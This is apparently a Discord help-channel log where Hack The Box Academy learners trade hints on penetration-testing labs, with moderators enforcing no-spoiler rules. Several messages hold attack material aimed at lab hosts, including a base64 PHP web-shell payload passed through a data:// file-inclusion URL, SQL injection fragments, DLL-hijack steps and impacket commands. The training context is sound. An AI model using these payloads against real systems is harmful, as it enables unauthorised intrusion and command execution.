Hello, i am on Q3 of the Attacking FTP module (https://academy.hackthebox.com/module/116/section/1165), i was able to find the other user name by file traversing but when i use hydra or medusa along with the pw list available in resources or try to run it with 'rockyou' I am not finding it. when i run the user list and the pw list together with hydra or medusa it only finds one user name and password and it isn't the correct one for the module, i actually think it was for a different module probably as i found the flag with the other user name. Can any one give me a nudge?

<@&861185840277487616>

Hello everybody, I am on “Uncovering 2FA Token Exploitation” from the Android Application Malware Analysis module. I’ having troubles interpreting the angr output. Can I ping someone who solved it for some help? Thx in advance 🙏🏻

I have the same issue. Did you ever figure it out?

you need to publish the c# script into one file. the issue is the machine they gave us to do this wont do it, i made a vm on virtualbox and got visual studio 2022 and published it because it needs internet connection then file transferred the .exe to my attack box.

Hey everybody! I have a question on the advanced sqli module, the skill assessment module to be precise.
I was able to find the first injection point but I couldn’t excteact the password. Looking at the solution to get some hint I found that I have to search specifically for passwoRd and every other variant won’t work. Why is that? What have I missed?

Powerview modules are not being recognized even after importing

tried through evil win and meterpreter

anyone had similar issues with this module?

Hey can anyone help me out with an openvpn issue? (Sorry this is the only channel it lets me talk in)

sorry i'm not following

i was referring to this module

I'd see if you can try anything under the Misconfigurations part of the section.

i tried an ftp bounce but it didn't seem to take, i've had to reset those machines alot becuase the ftp service does seem to want to start in that module for some reason

Yeah I would let it sit for about 5 minutes before verifying the port is open. Not talking about attacks, rather Misconfigurations.

Umm, why my messages got deleted?

lol

You were posting content above Tier 0 and included an answer, i.e., #/#.

Oh, sorry lol.

is going back to the footprinting module recommended? i wasn't sure since the module said in this one we will focus on attacks on misconfurations

All good and I believe there is a user in a group or something, which wouldn't have shown up with the user search.

Nope, just scroll through that section and find the Misconfigurations header, then read below it.

goddamn it

thanks @gray yacht

Hii im a beginner to cybersec installed kali rn. What should i be doing now? Is learning python a good next step?

i was trying to use auth keys file for another users login i found

for ssh lol

There is a user in a group, and it showed up because of the [*1..].
I'm not familiar with Azure tho, there might be another thing that does not show up with that query.

Gotcha, yeah I don't recall off the top of my head. I did the same stuff you did, so I wouldn't sweat it.

This is a question more suited for #general or #careers-and-certs and if you do not have access to those channels, head over to #welcome to verify your account and read over the #rules.

yes, this has been asked multiple times on discord and you also find it in the documentation e.g. in the code block section.

You can basically do anything using html and css also inline

can anyone help

docx is a proprietary format. Sysreptor only supports generating PDFs.

So if you currently work on a Sysreptor project you would have to redo your report in word

ngl im a bit dumb im gonna just use microsoft word to edit the colour and stuff then save to pdf and upload

got the flag thanks again @gray yacht

Hey guys anyone on the Attacking AI - Application and System the MCP part recently?

Hey HF were you able to finish the module?

Any help for this issue?

I was not running the project as "Console App (.NET Framework)". It is not the first one that shows up when opening Visual Studio. Use the search bar, look for .net framework console and choose the first one.

you can DM me

Done 🙂

Password Attacks
Credential Hunting in Windows

question: What password does Bob use to connect to the Switches via SSH? (Format: Case-Sensitive)

i got the password of the port 22 but for some reason its not accepting it , its "__admin*** " right?

any hints?

Ill take a look, thanks for the reply

has anyone had trouble with the pass the certificate portion for password attacks? i cant get printerbug.py to work. nothing happens after i hit enter

thaats not the right password

hint: rdp to his desktop and you should see an interesting file, poke around in it and see what you can find

Soc Analyst / Windows Event Logs & Finding Evil / Analyzing Evil With Sysmon & Event Logs

Replicating the DLL Hijacking with calc.exe doesn't work.

Steps:

1. Renaming reflective_dll.x64.dll to WININET.dll
2. moving calc.exe from C:\Windows\System32 along with WININET.dll to a writable directory (such as the Desktop folder)

Step 2 doesn't work since I don't have trusted access to the RDP. I can't move the calc.exe to any other folder.

Managed...

Insane module, once more, really good job HTB Team, Those Ai Red Teaming modules where really good! 10/10

Hey

What do you need help with?

?! 👀

Hey mates, can somebody help me, im doing the Advanced SQLi SA, by now y can exfiltrate the data of the two users in the data base, but when i craft the reset key using python and java with the same functions, the page throws me invalid key message, if somebody can help me let me know, i can DM u o u can DM me

Bro why delete

@river furnace This server isn't support for video games. Contact the makers of the game.

anyone experiencing issues with boxes not starting?

L channel L support fr

@river furnace I don't care who said what. We can't help with this. This is not the server for that.

wtf

im witnessing a meme in the making

Telegram bro

lol

If somebody know something i would appreciate it

here too

did you open as admin

sure bro

I solved it but I think it's unintended

I think you should use Event Viewer but I didn't

what about copying instead of moving

doesn't work

u should run calc.exe after doing the steps and a message box should pop up

it runs calc normally

yeah dont see why admin wouldnt work

Ok Solved

you don't need admin

you gotta run "calc.exe" in user-mode cmd

what a mess fr!

hey im stuck on the 3rd question of the password cracking module, subsection windows lateral movement and pass the hash

ive succesfully ran netexec to change the DisableRestrictedAdmin to 0 (0x0), but connecting through xfreerdp3 with /pth:hash still fails

If I buy annual Silver Annual Plan, can I cancel and get remained refund at anytime?

Resolved.

Steps:

1. Go to C:\Tools\Reflective DLLInjection
2. Rename reflective_dll.x64.dll to WININET.dll
3. Move renamed file to Desktop
4. Open Administrator Powershell
5. Copy calc.exe from C:\Windows\System32 to Desktop
6. Open cmd (not admin cmd)
7. run calc.exe from cmd

so just clicking it doesnt work?

I think it would

If I buy annual Silver Annual Plan, can I cancel and get remained refund at anytime? Should I ask the question here or anywhere else?

The moment you buy you get the sub for the whole year

cancelling it just wont make it renew next year

are you sure it changed with nxc

did you enter with winrm first

I want to buy silver first and then upgrade to gold later but I want to cost minimumly

No one here can help with that. You'll have to reach out to support on the website and ask. Support for billing stuff isn't provided over Discord.

Hey, I am currently doing the "intro to whitebox pentesting" module, on skill assessment Q2.
I have patched the code to the point that it works and AI engines do not find vulnerabilities. However the site does not accept it and returns "result: injection failed" but does not return the flag, which is weird because that's the entire point of the exercise.

Can anyone please help?

Thank you

has anyone had trouble with the pass the certificate portion for password attacks? i cant get printerbug.py to work. nothing happens after i hit enter

Since Academy content regarding Windows is on Windows 10 boxes, is it also valid for Windows 11?

Yes

Windows 11 is Windows 10, just with more stuff

Thanks, that's good to know! So no difference at all regarding the attacks and everything th

yeah i never encountered anything

anyone toss me a hint or some help?

Nice! I was worried the knowledge I've gained will be useless, haha. Do you know if the Windows machines will be migrated to Win 11 OS soon?

Haven't heard anything about that

most of it will work on older versions of windows too, windows doesn't really change that much from version to version

all the basics are still there, like groups, permissions, acl's, etc

they don't actually rebuild the whole OS from scratch every time

Yes but I thought surely they must have killed all the attacks that were possible previously... I guess not then, which is good since I won't have to re-learn everything

nah, you usually attack windows misconfigurations rather than vulnerabilities

hello

im stuck in the wordpress skill assessment if anyone could help

Use a vulnerable plugin to download a file containing a flag value via an unauthenticated file download.

if i found the pluging how can i find the fiel for that ?

Module: Shells & Payloads > (page 5) Reverse Shells

I am connected to the academy VPN. I started the instance. When I try to ping it, no route to host. I'm not sure what's going on.

I've never had this issue before.
I just did a previous module which required me to be on Academy VPN
I switched VPN to US Academy 1. Download the vpn file. Connect to it. I do ip a and I get tun0 up with a 10.x IP.
I try to ping the machine instance and Destination host unreachable.

I think the Skill Assessment of Attacking AI System is broken.

Not every machine responds to a ping

Well I can't even connect to it via rdp

try it with the pwnbox

ok. thanks

thanks! I just had to spend alot more time on vsc, i think i wasn't building it as a solution

I'm also running a vm now and testing connections back to my linux machine for practice

I'm in the introduction to information security module for mobile security and it says how many layers are in device security. I put the answer as <4> according to the format suggested for the answer but it says it's incorrect

What about just 4

anyone got any recommendations on what modules to move onto? literally just finished the basic starter tutorial, im going for just learning it to have as a skill currently

https://tenor.com/view/chris-pratt-andy-dwyer-omg-shocked-face-meme-gif-281437442397920323

see the Information Security Foundations skill path

what does that teach?

The import is not working. Tried through evilwin and meterpreter

@autumn garnet did u end up getting the shellcode loader to work? i never got it working but the revshell later worked. i just started using msvenum launching notepad shellcode but that still fails

I anyone else currently experiencing issues with the web shell in AD Enumeration & Attacks - Skills Assessment Part I? 🤔

hi, I am new to htb.
I have an issue where I can connect to htb openvpn but to get into the website first I have to connect some vpn first because of my location. so double vpn, I can spwn the machines with openvpn connected but ping and other remote stuff doesn't work.

I am dying to learn htb but because of that issue, I can't even pass starting point meow, because telnet keeps disconnecting.

is there any vpn solution for this ? thanks

Take a look at the PwnBox

Hi everyone, I'm new here and just started htb and wanted to know for the "craking into htb" path. Could i ask some advices and also i have some questions like for free users when you accidentally close the VM workstation do u have to wait 24h and one last thing is there any offer and discount for students?

There's a student subscription that is heavily discounted

anyone i can dm for cl.te ?

Yes you need to wait 24 hr to reset ! Student discount are worth it’s only 8 dollar I am currently using it. To learn CPTS highly recommend +(unlimited VM on module )

And how can I subscribe as a student

hello everyone
i'm stuck on this question, i've found creds for the user in previous question, but I don't know where to use them (that's all I can say here)

can someone help plz,thank you

Try to add email (student email)

On your account then 💥

Thanks for the help

common remote access solution

• figure what that could mean

could be rdp, winrm, etc.

seems like the old rdp problems stills there

it also helps to know what module and section you're working on @crude grove

pivoting

https://tenor.com/view/do-you-have-any-idea-how-little-that-narrows-it-down-that-narrows-it-down-clear-now-its-clear-now-i-understand-now-gif-21256627

it's better to mention the name of module + section , what did you try

pivoting it's tooo vague

common remote access

maybe rdp to an internal machine

because the question mentions (For your next hop)

:)

Pivoting, Tunneling, and Port Forwarding ,Skills Assessment , 6th question
I tried every service the connection drops

i mean use rdp from inside your existing/previous xfreerdp session

that's the simple answer ¯_(ツ)_/¯

i will feel so stupid if this will work 🙂 ,thank you, i'll try it

Hey @everyone
I’m currently diving into Mobile Pentesting and learning more about bypassing Dynamic SSL Pinning on Android apps.
I’ve tried some approaches using Frida and Objection, but I’d love to hear from the community:

🔹 What are your go-to tools or techniques for effectively bypassing SSL Pinning in real-world scenarios?
🔹 Any recommended writeups, scripts, or labs I should check out?

Thanks in advance for any advice or pointers 🙏

#academy-announcements message

The Academy offers various modules that deal with mobile pentesting.

Thanks for the reply
I’ve already gone through the Academy modules on mobile pentesting and learned a lot from them.
Now I’d like to take my skills to a more advanced level, especially around bypassing dynamic SSL pinning and building stronger defenses.

Do you have any recommendations for advanced resources, labs, or tools that go beyond the Academy content?

hey guys
Password Attacks

Pass the Ticket (PtT) from Linux

Check the /tmp directory and find Julio's Kerberos ticket (ccache file). Import the ticket and read the contents of julio.txt from the domain share folder \DC01\julio.

i got till here but smbclient is not responding. need help in this please.!

You guys need to rework that Windows Event Logs module, this shit is ass. No proper info, no pre-built environment that is ready for the steps, needs lots of steps to reproduces whatever is needed to solve the questions, not enough guidance through steps to reproduce. Like wth is that module for

Sounds like you learned a lot actually. If you feel there are errors you can post in #1234357888114364508 or you can use /feedback to provide feedback to staff.

Sure thank you

Hello, can somebody help me with the Advanced SQLi SA, in the question two, i can bypass the filter with the ' encoded ||%27|| and i can run some payloads like ||34%27%20AND%201%3D1%20%2D%2D|| but when i wnat to run the RCE payload like SELECTS and this stuff i dont achieve the execution, i will appreciatte a hint or somthing, actually i already try ||; SELECT||

Hi everybody, what can i do when a target is stuck in "spawning" stage except waiting?

@cyan lily You can report it to WhatsApp. This also has nothing to do with HTB or modules, please stay on topic.

Oh sry

Anyone.?

@plain summit Please take care not to post content from modules above tier 0

Oh I can't do the ||censor||?

Spoiler tags do nothing

Hello, if somebody have the time and can help me with my script, I achieve to create the large_object but i dont know how to create the function, DM me if u want to help me with my payload or just give me a hint thanks a lot

Best to say which module/section/question you're on.

sorry ur rigth im in Advanced SQLi SA question 2

I need help with AD Enumeration & Attacks question 2, my meterpreter exploit is not working

@jade frigate Please take care not to post content from modules above tier 0

I'm sorry for that, I forgot about it

Hey

#general

#modules

Hey everyone I wanted to ask about the last challenge of ai red teaming ctf going live. Can anyone help me with that

We can't help with active CTFs

xfreerdp /v:10.129.43.43 /u:sql_dev /p:'Str0ng_P@ssw0rd!' /cert-ignore -sec-nla +sec-tls +sec-rdp when I run this command in windows privilege esclation module then I get this "to signin remotely you need to right through sign in remote desktop services by defaul member of remote desktop user have this right, if your group don't have this right or the right have been removed from the remote desktop user group then you have to grant this right manually" , but how can I grant the right manually without the access or privilege of that devices, anyone please help how to fix this issue

You find a way to add yourself to the group or login with a user who is already in the group

thank you sir, but without accessing the machine how can we add myself to that group , or how can I know that which user are in remote desktop user group ??

Which section are you working on?

SeImpersonate and SeAssignPrimaryToken

Focus on the name of the user and what services he can access

It was showcased in the section as a hint

thank you sir, now it working

Modules > Intro to C2 Operations with Sliver.
I install
[] Client v1.5.43 - e116a5ec3d26e8582348a29cfd251f915ce4a405 - windows/amd64
Compiled at 2025-02-20 04:58:51 +0900 KST
Compiled with go version go1.20.7 linux/amd64
[] Server v1.5.43 - e116a5ec3d26e8582348a29cfd251f915ce4a405 - windows/amd64
Compiled at 2025-02-20 04:58:51 +0900 KST in windows 11.
When I execute 'armory install all' command, i can't install all files.
Is there any solutions to solve the problem?

strange, i never got this problem in sliver, the problems are others

in this module

I remove all sliver and reinstall it but same problem in windows 11. Did you run sliver in kali or ubuntu?

I did the room using pwnbox

I see. When I run sliver in kali, it execute command well but in windows I can't install the armory extensions and exe files. It could be windows problem. Thx. I have to find the way to install sliver in windows.

/bin/dash is symlink to /bin/bash or dash is symlink to /bin/bash

in the pivoting modules, the victim box interface is always xx.xx.xx.xx/16
why do i route /24 instead of /16 when i use ligolo?

If you know what you're doing you don't have to, but if you route a /24 with /16 you'll have problems that'll be hard to spot so it's good practice to route with the smallest mask you can.

Guys does module pwnbox has "'save progress" feature or such thing? im tired redoing all the stuff i already done when i decide to take break...

the pwnbox has minimal saved storage so nope, I recommend using your own VM

hmm... what about the pwnbox on cpts exam? im planning to take it on next year and im afraid my desktop performance is not even close to smooth so probably my best bet is on pwnbox...

I don't know I didn't use it but I'm pretty sure it'll be the same pwnbox,so again: minimal save storage

Uhm sorry but how am I going to fix this? (I've tried changing my VPN but it keeps saying that I don't have any instances left).

Hi all

i need a help

you can dm me

Are you gonna elaborate or just gonna wait for a fortune teller or a psychic?

try ctrl + shift + f5

i did find out What version of the SMB server is running on the target system and did submit the answer but it was not correct

Which module and section?

Read through that section's Footprinting/Nmap header again the answer is actually already in the example output.

I did say in #cpts to include the module and section......

could i get a little nudge for HTTP Attacks - HTTP Response Splitting? managed to get it to work with ||?target|| but not sure what the error is

"This is different for rejected packets that are returned with an RST flag. These packets contain different types of ICMP error codes or contain nothing at all." I think this is incorrect, right? When a firewall rejects a packet sends back an ICMP message, RST packet is sends back by an open/closed port using the TCP-ACK scan

It's an either/or scenario, it's either a TCP packet with an RST flag, or an ICMP packet depending on the firewall configuration (it can also send nothing at all)

you can DM me

Just on web attacks - mass idor enumeration section. The Lab is taking well over 15 minutes for ito to load and now coming up to 5 minutes to load the main page, clicking on documents within took another 5 minutes more or less. Is there something that would be slowing this down? trying new vpn now but idk if its that.

The Web Proxies module is a bit outdated when we get to the step-by-step of configuring ZAP and Foxy Proxy, some of the print screens and steps doesn't exist anymore

#1234357888114364508

Thanks

Hey everyone this is my first time here . I’m starting my career in i.t soon and I’m graduating with a degree in i.t but my end goal is cybersecurity. I’ve been debating on either going back and getting my bachelors degree in cybersecurity or just go the certification route. Does anyone have any advice on what I should do?

#careers-and-certs if you don't have access read #rules and follow #welcome

Looking for some help on Attacking Domain Trusts - Child -> Parent from Linux

I have the ccache ticket, ligolo set up, tunnel is started

psexec and raiseChild just fail with [-] [Errno Connection error (LOGISTICS.INLANEFREIGHT.LOCAL:88)] [Errno 111] Connection refused

If anyone can nudge me as to why it's failing that would be great! Please @ with replies

can someone help with the Burp intruder fuzzing, the challenge is to fuzz for '.html' files under the /admin directory but I have been fuzzing for 30 minutes with nothing (USING WEB PROXIES module)

I'm working on Stack-Based Buffer Overflows on Linux x86 - Skills Assessment - Buffer Overflow. I've gotten to the point where I can launch a reverse shell and run commands. I've also tried to use the linux/x86/exec and linux/x86/read_file shellcodes. However, no matter what I use I don't have permissions to access the flag.txt file under /root. Can someone give me a hint as to what to try next?

Hey everyone has someone finished Android Fundamentals, if yes, can you send me the answer?

No one here will send you any answers. That's not how you get help here.

You can ask questions here, such as:
I am in module XXX, section YYY, and am stuck on question ZZZ. Can anyone help me?
If someone has worked through the module, they can probably give you tips on how to find the solution.

problem solved, used ffuf instead

I am in module Funnel and I am trying to set up my local port forwarding. I believe that the start of the command is ssh -L <LOCALPORT>:<REMOTE_HOST>:<REMOTE_PORT> USERNAME@SSH_SERVER ... But am I supposed to do that on my attack box or the target?

Attack box

Thank you!

Have anyone answer this question:
Create an AVD for 'Pixel 3a API 34 Google APIs' using Android Studio. What is the build number of the device? (Format: build_number, Example: build_number-test)

I tried useing Android Studio, that the answer is wrong

Would recommend using Ligolo, much easier, works better

Maybe someone can help with the PHP Wrappers module, I enter the command as indicated in the example, but I do not display what it should, I don’t understand why other symbols sharply appear there.

this is the example:

Can you show the other half of the URL

Try URL encoding the payload

Example: http://<SERVER_IP>:<PORT>/index.php?language=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWyJjbWQiXSk7ID8%2BCg%3D%3D&cmd=id
My: http://94.237.57.115:35592/index.php?language=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWyJjbWQiXSk7ID8+Cg==

As I said

In the example +Cg== is replaced by %2BCg%3D%3D, I do not understand why.

URL encoding

How can I encode like this

Use Burp or Cyberchef

I encoded it in Burp and got it:

don't encode all the characters

Can anyone one help me on this

Anyone help me

that ticket looks expired

Yeah it was yesterdays i tried it with new ticket to but the smbclient is not responding

I encode only +Cg== and got it again

Restart the lab

I just checked and I'm unable to connect either

Ok, I did it, thanks, but why do i need encode only +Cg== second time?

anyone can help me?

+ is interpreted as a space

hello, little bit of topic but can someone help me with a ctf http head attack?

There is no support for active CTFs. Contact the CTF operator for further assistance.

Anyone for this? Was able to solve using the parrot machine that spawns, but I have no idea why it won't work from my own host?

Module: Shells & Payloads
Section: Live Engagement

What distribution of Linux is running on Host-2? (Format: distro name, all lower case)

I have got the metasploit module for this blog version. I setup the options, type exploit, and it fails:

Any advice?

It says no CSRF token found, can't continue

There is no csrf token in the html source. The exploit doesn't seem to work.

Oh you have to set the vhost parameter too. Doh. I got it now

hi guys how are you ?

i try web requests > CRUD API

and i cant solve this ctf

First, try to update any city's name to be 'flag'. Then, delete any city. Once done, search for a city named 'flag' to get the flag.

i was did this . but dont see flag

curl -s 94.237.61.242:36315/api.php/city/flag
[{"city_name":"flag","country_name":"HTB"}]

Please specify the module and the section you're working on

Is there a problem with the modules?

I completed this module 100%, but it won't give me the achievement. I went back and looked at every page of the module, every question is done/filled in, completed.

Strange it definitely is implying you've missed a section

I've done the entire module

its laudanum one webshell to rule them all @tranquil crystal

its not showing as complete....

Oh let me double check, thanks for the catch!

Oh I did miss a question

funny enough I did same thing and it was a missing question xD

Doh.

on that section... DUH!

web request CRUD API

https://academy.hackthebox.com/achievement/1014841/115 Finally!

hello guys, if I get the silver subscription, if I don't spend the 200 cubes, will I have 400 cubes next month?
Is it accumulative ?

user does not exist

any of the labs that are not on the 10.x.x.x range seem to be very very very slow -_- becoming painful

is it best to report to /support for that?

@icy plume don't share info for modules above tier 0

nvm its my proxy being annoying... all this time :d

can I get a prod / nudge on Skills Assessment Web Attacks please.

Super odd question:

Currently working through Attacking Domain Trusts - Cross Forest from Linux

Within their example in the module they use wley for their user but have us sign in for the lab as htb-student. Are we supposed to be taking notes of past "pwned" user creds for these labs? Please @ with replies

I believe in that module theres sections that reference creds that in later they say connect to X, without specifying them again and its vaguely implied you will need the previous sections creds.

Not much of an answer for you but that module and couple others did similar

Nah that makes sense, just a bunch of annoyances to be honest, but thanks

``└─$ impacket-GetUserSPNs -target-domain FREIGHTLOGISTICS.LOCAL INLANEFREIGHT.LOCAL/wley
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies

Password:
[-] [Errno Connection error (FREIGHTLOGISTICS.LOCAL:389)] [Errno -2] Name or service not known``

any idea why this error occurs? working through attacking domain trusts - cross forest from linux

i've always been wondering how actors behind very sophisticated (potentially state sponsored) cyber attacks stay anonymous, many here probably remembers the not-so-recent-but-recent xz backdoor so i'll use that as an example; one of the actor(s) behind it has a regular github profile with a public email address. how can no one (including microsoft the host of the github platform, the authorities controlling the internet providers, and other hackers with means to gather information illegally) trace them? surely such intrusions attract a global manhunt for them, especially from other cyber security experts. yet they don't even know the country the supposed bad actors are from, let alone any other form identity.

Hi Guys, I need help understanding this part in Password Attacks as it is not making sense to me.

In "Pass the Ticket (PtT) from Linux", at the segment of "Using Linux attack tools from Kerberos" where we use chisel on attack host and rdp into MS01 and use chisel thr as well.

What does it mean by transfer?

Finally, we need to transfer Julio's ccache file from LINUX01 and create the environment variable KRB5CCNAME with the value corresponding to the path of the ccache file.

Not the place for this, this is for HTB modules, not general conversation topics

i can't tak in #general

It's been a while since I've done this, but you want to take the ccache file and transfer the file to your attack host --> then set the variable

Does you edit /etc/hosts?

so if I am understanding it correctly, we take the ccache file from MS01 and transfer it over to the attack host?

If I remember correctly yes

ty, typo in hosts file

hmmm feels kinda weird though coz the whole flow seems weird to me as it is:

attack host (no connection to KDC/DC) -> modify host and proxychains file -> use chisel -> xfreerdp into MS01 & excute chisel -> transfer ccache file from LINUX01

anyone able to help on this? keen but blocked 😄

how do i go from MS01 to LINUX01? i cant connect the dots on it

Gotta use a pivot, I suggest Ligolo

hi for question 2 of Kerberoasting from Linux section of AD Enumeration and Attacks module, I found a list of groups, but I am having trouble narrowing down just groups the user I specify is part of. I tried using the flag to specify the user but its not working.

its giving my all local groups I think and not just ones for that user

can someone help me out here?

Not the channel for this.

@digital pendant do you have any channel for that

can you give a little more info? What groups do you have? What do you want to narrow down too?

<@&861185840277487616> Not the discord for this

Guys take this elsewhere... clearly not the right discord for this

I probably am sharing too much so this is an issue

I don't want to spoil

Okay, so, think of your powerful groups - Ent. Admins, Domain Admins, SQL Admins etc --> use grep on the output / findstr on windows

Take it to dms

Can't share content from above tier 0 guys

got the flag thanks

I think I had to guess but I got it

thanks guys

You're welcome

Sorry if responding to that was a rule break, my bad!

Does anyone have a way to make the whole forest and cross-forests thing more understandable? I'm very lost and confused when it comes to this

Hey there... I have just setup a live usb to run pwnbox locally, I am using their vpn(it runs correctly) but when I tried to ssh into a target system it said no route to host

add the host to /etc/hosts

first step I take ^

all good now! I wasn't looking for the thing I thought I was 😄

try it with enum4linux